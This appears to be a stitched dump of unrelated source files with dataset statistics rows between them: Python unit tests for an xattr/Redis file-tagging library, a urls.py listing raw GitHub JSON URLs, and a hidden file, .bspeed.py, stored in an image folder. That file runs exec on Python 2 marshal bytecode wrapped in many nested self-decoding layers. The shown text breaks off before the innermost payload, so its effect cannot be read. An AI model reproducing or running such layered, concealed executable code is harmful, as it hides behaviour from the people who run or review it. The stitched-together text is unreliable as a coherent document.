test_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.json')
tmp_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.tmp')
x = make_xattrfile(test_data_file_path)
x.tags['key1'] = b'value1'
x.copy(tmp_data_file_path)
y = make_xattrfile(tmp_data_file_path)
y.delete()
r = x.get_redis_callable()
self.assertFalse(r.exists(y._redis_key))
def test_22_write_tags(self):
test_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.json')
tmp_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.tmp')
x = make_xattrfile(test_data_file_path)
x.tags['bar'] = 'bar'
x.tags['foo'] = u"foo ééé"
print(x.tags)
x.write_tags_in_a_file(tmp_data_file_path)
os.unlink(tmp_data_file_path)
def test_23_unicode(self):
test_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.json')
tmp_data_file_path = os.path.join(self.test_data_dir_path,
u'test_file.tmp')
x = make_xattrfile(test_data_file_path)
x.copy(tmp_data_file_path)
y = make_xattrfile(tmp_data_file_path)
y.tags['basic'] = 'basic'
y.tags[b'bytes'] = b'bytes'
y.tags[u'unicode'] = u'unicode ééé'
y.commit()
y._read_tags()
self.assertEqual(y.tags['basic'], b'basic')
self.assertEqual(y.tags[b'bytes'], b'bytes')
self.assertEqual(y.tags[u'unicode'].decode('utf8'), u'unicode ééé')
y.delete()
| 43.875
| 79
| 0.590954
| 1,900
| 14,040
| 3.97
| 0.073158
| 0.131513
| 0.154315
| 0.095453
| 0.817447
| 0.800477
| 0.777277
| 0.758452
| 0.736047
| 0.719873
| 0
| 0.015913
| 0.315171
| 14,040
| 319
| 80
| 44.012539
| 0.768591
| 0.006054
| 0
| 0.702422
| 0
| 0
| 0.069381
| 0.001935
| 0
| 0
| 0
| 0
| 0.145329
| 1
| 0.083045
| false
| 0
| 0.017301
| 0.00346
| 0.117647
| 0.00346
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
25ab815a25cf8a0ac380d6ab3af840d7871b51b6
| 228
|
py
|
Python
|
db/urls.py
|
kavanc/data-management-lab-7
|
d183c6ab0313233028b68eae9e39295ec5ccadc4
|
[
"MIT"
] | null | null | null |
db/urls.py
|
kavanc/data-management-lab-7
|
d183c6ab0313233028b68eae9e39295ec5ccadc4
|
[
"MIT"
] | null | null | null |
db/urls.py
|
kavanc/data-management-lab-7
|
d183c6ab0313233028b68eae9e39295ec5ccadc4
|
[
"MIT"
] | 3
|
2020-11-18T20:20:48.000Z
|
2020-11-25T18:40:05.000Z
|
# overall
urls = [
'https://raw.githubusercontent.com/Badr1600/data-management-lab-7/master/db/data/players.json',
'https://raw.githubusercontent.com/Badr1600/data-management-lab-7/master/db/data/teams.json'
]
| 38
| 101
| 0.714912
| 30
| 228
| 5.433333
| 0.533333
| 0.09816
| 0.306748
| 0.343558
| 0.809816
| 0.809816
| 0.809816
| 0.809816
| 0.809816
| 0.809816
| 0
| 0.049505
| 0.114035
| 228
| 5
| 102
| 45.6
| 0.757426
| 0.030702
| 0
| 0
| 0
| 0.5
| 0.83105
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
25c80124b2842b414dafc33b79fd3c3f25ac4e46
| 87,424
|
py
|
Python
|
core/pattern/_img/.bspeed.py
|
alimdsoban/bpat
|
bde9b15c81f782d9280c8e13a450b3b95f8d203c
|
[
"MIT"
] | 27
|
2020-06-18T06:35:30.000Z
|
2022-03-26T09:15:58.000Z
|
core/pattern/_img/.bspeed.py
|
alimdsoban/bpat
|
bde9b15c81f782d9280c8e13a450b3b95f8d203c
|
[
"MIT"
] | null | null | null |
core/pattern/_img/.bspeed.py
|
alimdsoban/bpat
|
bde9b15c81f782d9280c8e13a450b3b95f8d203c
|
[
"MIT"
] | 5
|
2020-07-31T13:15:22.000Z
|
2021-12-13T21:36:13.000Z
|
import marshal
exec marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x94\x80\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xfe\x7f\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsh\x7f\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xd2~\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs<~\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xa6}\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x10}\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsz|\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xe4{\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsN{\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xb8z\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs"z\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x8cy\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xf6x\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs`x\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xcaw\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs4w\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x9ev\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x08v\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsru\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xdct\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsFt\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xb0s\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x1as\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x84r\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xeeq\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsXq\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xc2p\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs,p\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x96o\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x00o\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsjn\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xd4m\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs>m\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xa8l\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x12l\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs|k\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xe6j\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsPj\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xbai\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs$i\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x8eh\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xf8g\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsbg\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xccf\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs6f\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xa0e\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\ne\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNstd\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xdec\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsHc\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xb2b\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x1cb\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x86a\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xf0`\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsZ`\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xc4_\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs._\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x98^\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x02^\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsl]\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xd6\\\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs@\\\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xaa[\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x14[\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs~Z\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xe8Y\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsRY\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xbcX\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs&X\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x90W\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xfaV\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\